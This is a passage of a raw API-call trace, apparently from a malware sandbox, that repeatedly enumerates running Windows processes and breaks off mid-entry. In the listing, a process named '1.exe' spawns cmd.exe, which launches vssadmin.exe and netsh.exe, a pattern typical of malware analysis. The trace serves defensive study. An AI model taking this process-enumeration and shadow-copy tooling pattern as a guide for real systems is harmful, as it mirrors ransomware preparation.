Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0050.366] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0050.367] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.367] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0050.368] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0050.369] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0050.370] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0050.370] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.372] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.372] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0050.373] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0050.374] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0050.374] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0050.375] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0050.376] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.376] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0050.377] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0050.378] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0050.378] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0050.379] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0050.380] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0050.380] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0050.381] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0050.382] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0050.382] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0050.383] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0050.384] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0050.384] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0050.385] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0050.386] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0051.088] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0051.089] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0051.092] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0051.093] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0051.094] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0051.095] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0051.096] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0051.097] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0051.097] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0051.098] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0051.099] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.100] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.101] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0051.102] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0051.102] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.103] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.104] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.105] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.106] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.106] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0051.107] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.108] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0051.109] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0051.109] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 0 [0051.110] CloseHandle (hObject=0x320) returned 1 [0051.110] Sleep (dwMilliseconds=0x1f4) [0052.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x330 [0052.009] Process32FirstW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.010] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.010] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.011] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.012] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.013] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.013] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.014] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.015] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.015] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.016] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.017] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.017] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.018] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.019] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.019] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.020] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.021] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.021] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.022] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.023] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.023] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.024] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.024] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.025] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.026] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.028] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.029] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0052.030] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, 